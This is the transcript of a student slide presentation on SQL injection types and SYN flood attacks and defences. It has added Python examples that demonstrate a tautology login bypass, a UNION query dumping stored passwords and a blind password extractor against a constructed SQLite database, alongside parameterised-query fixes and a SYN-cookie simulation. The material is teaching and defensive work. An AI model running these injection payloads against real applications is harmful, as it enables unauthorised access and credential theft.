computer security description about sql-injection and syn attacks


Upload: tesfahunegn-minwuyelet

Post on 13-Apr-2017


TRANSCRIPT

Slide 1

Bahir Dar University, Bahir Dar Institute of Technology

Faculty of Computing, Department of Computer Science, 4th year, Section B

Computer Security Assignment Presentation

BY: Tesfahunegn Minwuyelet

Date of Submission: 09/11/2016 GC.

Slide 2

SQL Injection and SYN Attack: Contents

• SQL injection
• Types of SQL injection (SQLi)
• Parameters for protection
• SYN attack
• SYN flood defence categories
• 10 hacks that made headlines

Slide 3

SQL Injection (SQLi) is a code injection technique used to attack data-driven applications: an attacker supplies input, for example through a web form field or URL parameter, that the application incorporates into an SQL statement, so that the injected text is interpreted as part of the query rather than as plain data.

Injected SQL can change the meaning of the statement and compromise the security of the web application, e.g. by dumping the database contents to the attacker. The root cause is building queries by concatenating untrusted client input into SQL text.

The risk from SQL injection is rising because of automated tools. In the past the danger was somewhat limited because an exploit had to be carried out manually: an attacker had to type each SQL statement into a text box by hand. Automated scanners now find and exploit injectable parameters at scale.

Slide 4

Types of SQL injection

SQL Injection can be used in a range of ways to cause serious problems. By leveraging SQL Injection, an attacker can bypass authentication, and read, modify or delete data within a database. In some cases SQL Injection can even be used to execute commands on the operating system, potentially allowing an attacker to escalate to more damaging attacks inside a network that sits behind a firewall.

There are three types of SQLi:
• In-band SQLi (classic SQLi)
• Inferential SQLi (blind SQLi)
• Out-of-band SQLi

Slide 5

In-band SQLi (classic SQLi) is the most common and easiest to exploit of the SQL Injection attacks. It occurs when an attacker is able to use the same communication channel, normally the HTTP request and response, both to launch the attack and to gather its results.

The two most common types of in-band SQL Injection are:
• Error-based SQLi
• Union-based SQLi

Slide 6

Error-based SQLi is an in-band SQL Injection technique that relies on error messages returned by the database server to obtain information about the structure of the database (table and column names, data types, sometimes the data itself).

In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database.

While detailed errors are very useful during the development phase of a web application, they should not be shown to users on a live site: log them to a file with restricted access and return a generic error message instead.

Slide 7

Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result set, which is then returned as part of the HTTP response. The injected SELECT must return the same number of columns (with compatible types) as the original query, so attackers typically probe the column count first, e.g. with ORDER BY n or UNION SELECT NULL, NULL, ...

Slide 8

Inferential SQLi (blind SQLi), unlike in-band SQLi, may take longer for an attacker to exploit; however, it is just as dangerous as any other form of SQL Injection.

It is commonly referred to as “blind SQL Injection” because no data is actually transferred via the web application and the attacker cannot see the result of the attack in-band. Instead, the attacker reconstructs the data by observing how the application behaves in response to a series of true/false questions.

The two types of inferential SQL Injection are:
• Boolean-based blind SQLi
• Time-based blind SQLi

Slide 9

Boolean-based blind SQLi is a technique that relies on sending an SQL query to the database which forces the application to return a different response (for example a populated page versus an empty one) depending on whether the injected condition evaluates to TRUE or FALSE, even though no data from the database is returned directly.

This attack is typically slow (especially on large databases), since the attacker has to enumerate the database one character at a time from these yes/no answers.

Slide 10

Time-based blind SQLi is a technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding, using a vendor-specific delay such as SLEEP() in MySQL, WAITFOR DELAY in Microsoft SQL Server or pg_sleep() in PostgreSQL. The response time tells the attacker whether the result of the injected condition is TRUE or FALSE, even though no data from the database is returned directly. It is used when the application's output does not change at all between TRUE and FALSE conditions.

This attack is typically slow (especially on large databases), since the attacker has to enumerate the database one character at a time and pay the delay on every positive answer.

Slide 11

Out-of-band SQLi is not very common, mostly because it depends on features being enabled on the database server used by the web application.

It occurs when an attacker is unable to use the same channel to launch the attack and gather results, or when the server's responses are unstable or too slow for inference.

It relies on the database server's ability to make DNS or HTTP requests to deliver data to an attacker-controlled host.

Such is the case with Microsoft SQL Server's xp_dirtree extended stored procedure, which can be made to issue DNS requests (via a UNC path) to a server the attacker controls; and with Oracle Database's UTL_HTTP package, which can send HTTP requests from SQL and PL/SQL to a server the attacker controls.

Slide 12

Common injection patterns:
• SQL Injection based on 1=1 being always true (e.g. an id of 105 OR 1=1 turns a lookup of one row into a dump of the whole table)
• SQL Injection based on ""="" being always true (e.g. a username and password of " OR ""=" makes the WHERE clause always match, bypassing the login)
• SQL Injection based on batched SQL statements (a semicolon appends a second statement, such as DROP TABLE, to the original query, where the database driver allows several statements per call)

Parameters for protection

Some web developers use a "blacklist" of words or characters to search for in SQL input in order to prevent SQL injection attacks. This is not a very good idea. Many of these words (like delete or drop) and characters (like semicolons and quotation marks) occur in ordinary language and should be allowed in many types of input. (In fact, it should be perfectly legal to enter an SQL statement into a database field as data.) The reliable way to protect a web site from SQL injection attacks is to use SQL parameters (prepared statements). SQL parameters are values that are bound to an SQL query at execution time in a controlled manner, so the database treats them strictly as data and never as SQL syntax. Parameters cannot substitute for identifiers such as table or column names or ORDER BY terms, so those must be checked against an allow-list; a least-privilege database account and generic error messages limit what a remaining flaw can do.
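The patterns from slides 5 to 12 in one runnable example: union-based extraction (in-band), boolean-based blind inference, the 1=1 and ''='' tautologies against a login form, and SQL parameters as the fix. This is an added example for this page, not code from the original presentation; the in-memory SQLite database, its users and products tables, the sample accounts and the function names are all constructed for illustration.

```python
import sqlite3


def make_db():
    # Constructed sample data standing in for a web application's database.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'S3cret!'), (2, 'bob', 'hunter2');
        CREATE TABLE products(id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
    """)
    return con


# --- the vulnerable pattern: untrusted input concatenated into SQL text ---

def product_lookup_vulnerable(con, name):
    sql = "SELECT id, name, price FROM products WHERE name = '" + name + "'"
    return con.execute(sql).fetchall()


def login_vulnerable(con, username, password):
    sql = ("SELECT id FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return con.execute(sql).fetchone() is not None


# --- the fix: SQL parameters, bound by the driver at execution time ---

def product_lookup_safe(con, name):
    # The '?' placeholder is filled in by the driver; quotes inside `name` are data.
    sql = "SELECT id, name, price FROM products WHERE name = ?"
    return con.execute(sql, (name,)).fetchall()


def login_safe(con, username, password):
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None


# --- attacks against the vulnerable functions (payloads are constructed) ---

TAUTOLOGY = "admin' OR 1=1 --"      # slide 12: 1=1 is always true; -- comments out the rest
EMPTY_EQ = "' OR ''='"             # slide 12: ''='' is always true


def union_dump_credentials(con):
    # In-band, union-based (slide 7): the injected SELECT returns the same number
    # of columns (3) as the original, so its rows come back in the product
    # listing, i.e. on the same channel the attack went in on.
    payload = "x' UNION SELECT id, username, password FROM users --"
    rows = product_lookup_vulnerable(con, payload)
    return sorted((row[1], row[2]) for row in rows)


def blind_extract_password(con, username, max_len=32):
    # Inferential, boolean-based (slide 9): the attacker only sees whether the
    # product page came back empty or not, and asks one yes/no question per
    # request. A binary search on the character's code point needs about 7
    # requests per character instead of one per candidate character.
    def oracle(condition):
        payload = "widget' AND (" + condition + ") --"
        return len(product_lookup_vulnerable(con, payload)) > 0

    target = "(SELECT password FROM users WHERE username = '" + username + "')"
    length = 0
    for n in range(max_len + 1):
        if oracle("length(" + target + ") = " + str(n)):
            length = n
            break

    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126                     # assumes printable ASCII characters
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("unicode(substr(" + target + ", " + str(pos) + ", 1)) > " + str(mid)):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    con = make_db()
    print("login bypass, concatenated SQL:", login_vulnerable(con, TAUTOLOGY, "x"))   # True
    print("login bypass, parameterized SQL:", login_safe(con, TAUTOLOGY, "x"))       # False
    print("union dump:", union_dump_credentials(con))
    print("blind extraction of alice's password:", blind_extract_password(con, "alice"))
```

The same payloads fed to the parameterized functions are simply compared as literal strings: no product is named "x' UNION SELECT ..." and no user is named "admin' OR 1=1 --", so they return nothing. The blind extraction shows why slide 9 calls the attack slow: recovering a 7-character value costs roughly 80 requests, and a real attacker would add error handling and rate-limit evasion on top.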

Slide 13

SYN Attack

A SYN flood is a form of denial-of-service (DoS) attack in which an attacker sends a succession of SYN requests to a target system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.

It abuses the TCP three-way handshake (SYN, SYN-ACK, ACK) on which Internet connections are built.

For each SYN packet received, the target machine allocates resources for a half-open connection and sends an acknowledgement (SYN-ACK) to the source IP address.

Because the target never receives the final ACK from the (spoofed) source, it retransmits the SYN-ACK and keeps the half-open entry until the retransmission timer gives up. The exact schedule is stack-specific; the figures quoted here, five retries at 3-, 6-, 12-, 24- and 48-second intervals with the resources released 96 seconds after the last retry (about 189 seconds in total), are one operating system's defaults. Linux, for instance, uses a shorter exponential schedule controlled by net.ipv4.tcp_synack_retries.

Slide 14

Continue… The SYN flood is the most common type of flooding attack. The attacker sends a large number of SYN packets to the victim, which must hold a half-open connection for each one while waiting for a final ACK that never comes; the third step of the TCP three-way handshake is never executed. Once the half-open connection queue is full, new SYNs from legitimate clients are dropped.

The source addresses of the SYN packets in a SYN flood are typically spoofed to unreachable hosts. The SYN-ACKs therefore go nowhere, and because the addresses are forged the traffic cannot be traced back to the attacking computer by its source address alone.

Slide 15

SYN flood defense categories: Firewall based

• Examples: SYN Defender, SYN proxying
• Filters packets and connection requests at the network edge, before they reach the protected server, typically completing the handshake on the server's behalf and only forwarding connections that complete
• Maintains state for each connection
• Drawbacks: the firewall itself can be overloaded, and it adds processing delay to every packet

Slide 16

Continue… Server based

• Examples: SYN cache, SYN cookies
• SYN cache: the server keeps only a compact, hash-table-indexed record of each half-open connection instead of a full connection block, so many more pending handshakes fit in the same memory
• SYN cookies: the connection state is encoded in the SYN-ACK's initial sequence number and recomputed when the client's ACK arrives, so nothing is stored for a pending handshake at all; this removes the need to track half-open connections
• SYN cookies are implemented in Linux (sysctl net.ipv4.tcp_syncookies); the SYN cache is the approach taken by FreeBSD
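The attack from slides 13 and 14 and the SYN cookie defence from slide 16, modelled side by side. This is an added example for this page, not code from the original presentation and not a real TCP stack: the backlog size, the 189-second hold time (the sum of the retry schedule quoted on slide 13), the 5-bit counter / 27-bit MAC cookie layout, the secret key and the addresses are all constructed for illustration. The simulation is purely in-process; no packets are sent.

```python
import hashlib
import hmac
import struct

ISN_STATEFUL = 0x1000   # placeholder ISN for the stateful listener; its value is irrelevant


class HalfOpenTable:
    """Classic stateful listener, the target described on slides 13-14.

    Every SYN reserves a slot until the final ACK arrives or the SYN-ACK
    retransmissions give up. `hold_seconds` is that give-up time; with the
    schedule on slide 13 (retries after 3, 6, 12, 24 and 48 s, then 96 s more)
    it is 3+6+12+24+48+96 = 189 s. `backlog` is the SYN queue size. Both are
    constructed for this example, not measured on a real stack.
    """

    def __init__(self, backlog=128, hold_seconds=189):
        self.backlog = backlog
        self.hold = hold_seconds
        self.half_open = {}        # (src_ip, src_port) -> expiry time
        self.dropped_syns = 0

    def _expire(self, now):
        for key in [k for k, exp in self.half_open.items() if exp <= now]:
            del self.half_open[key]

    def syn(self, src, dst, now):
        """Return the ISN for the SYN-ACK, or None if the SYN had to be dropped."""
        self._expire(now)
        if len(self.half_open) >= self.backlog:
            self.dropped_syns += 1       # queue full: a legitimate client gets no SYN-ACK
            return None
        self.half_open[src] = now + self.hold
        return ISN_STATEFUL

    def ack(self, src, dst, ack_number, now):
        self._expire(now)
        return self.half_open.pop(src, None) is not None


class SynCookieTable:
    """Stateless listener using SYN cookies (slide 16).

    The ISN in the SYN-ACK is a MAC over the 4-tuple and a coarse time counter;
    nothing is stored. A spoofed source never completes the handshake, so it
    costs the server no memory; a genuine ACK is verified by recomputing the
    MAC. The 5-bit counter / 27-bit MAC layout is this example's simplification
    (Linux also packs an MSS index into the cookie).
    """

    def __init__(self, secret, window_seconds=64):
        self.secret = secret
        self.window = window_seconds

    def _cookie(self, src, dst, counter):
        msg = f"{src[0]}:{src[1]}>{dst[0]}:{dst[1]}|{counter}".encode()
        mac = hmac.new(self.secret, msg, hashlib.sha256).digest()
        mac27 = struct.unpack("!I", mac[:4])[0] & 0x07FFFFFF
        return ((counter & 0x1F) << 27) | mac27

    def syn(self, src, dst, now):
        return self._cookie(src, dst, int(now) // self.window)   # always answered

    def ack(self, src, dst, ack_number, now):
        isn = (ack_number - 1) & 0xFFFFFFFF          # the client ACKs ISN + 1
        current = int(now) // self.window
        # Accept the current and the previous window: a slow handshake still
        # completes, and a captured cookie stops validating after ~2 windows.
        return any(isn == self._cookie(src, dst, c) for c in (current, current - 1))


def flood_then_connect(server, syn_rate=10.0, flood_seconds=60.0):
    """Spoofed SYNs from unreachable sources for `flood_seconds`, then one
    legitimate handshake. Returns True if the legitimate client connects."""
    dst = ("192.0.2.10", 80)                       # victim (documentation address)
    now, n = 0.0, 0
    while now < flood_seconds:
        spoofed = (f"203.0.113.{n % 250 + 1}", 1024 + n)   # never sends the final ACK
        server.syn(spoofed, dst, now)
        n += 1
        now += 1.0 / syn_rate
    client = ("198.51.100.7", 50000)
    isn = server.syn(client, dst, now)
    if isn is None:
        return False
    return server.ack(client, dst, (isn + 1) & 0xFFFFFFFF, now + 0.05)


if __name__ == "__main__":
    stateful = HalfOpenTable(backlog=128, hold_seconds=189)
    print("stateful listener, legit client connects:", flood_then_connect(stateful))
    print("SYNs dropped by stateful listener:", stateful.dropped_syns)
    cookies = SynCookieTable(secret=b"constructed-example-secret")
    print("SYN cookie listener, legit client connects:", flood_then_connect(cookies))
```

The arithmetic behind the first result is the whole attack: a backlog of B entries held for T seconds fills whenever the spoofed SYN rate exceeds B/T, here 128/189, under one SYN per second. Ten forged SYNs per second are enough to lock out every legitimate client, which is why lowering the hold time or enlarging the backlog only buys a constant factor, while SYN cookies remove the stored state the attacker was exhausting.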

Slide 17

Continue… SYN kill

SYN kill monitors the network and, when it detects SYNs whose SYN-ACKs are never acknowledged, automatically generates RST packets to free the half-open resources on the server.

It classifies source addresses as likely spoofed or legitimate from the traffic it observes, and resets connections from suspect addresses promptly while leaving legitimate handshakes alone.

Slide 18

Continue… MULTOPS

Monitors the rates of packets going to and from a victim; a large disproportion between the two directions indicates an attack.

Blocks or rate-limits traffic from the offending address ranges outside the network, limiting the IP range from which the attack can continue.

Slide 19

Continue… Route-based Distributed Packet Filtering

Uses routing information to decide whether a packet arriving at a router could legitimately have come from its claimed source address over that link; packets whose source/destination addresses are inconsistent with the routes are spoofed and are dropped.

Results show that many spoofed packets can be filtered at the routers, and those that cannot be filtered can be traced back easily because the filtering narrows the set of possible origins.

Slide 20

10 HACKS THAT MADE HEADLINES

• Markus Hess hacks on behalf of the KGB
• Robert Morris hacks the Internet
• Vladimir Levin hacks Citibank
• Jonathan James hacks NASA
• Adrian Lamo hacks the New York Times
• Gary McKinnon hacks the US military
• Albert Gonzalez hacks TJX (and many more)
• Anonymous hacks HBGary
• LulzSec hacks Sony
• News of the World hacking scandal


Slide 21

Thanks!!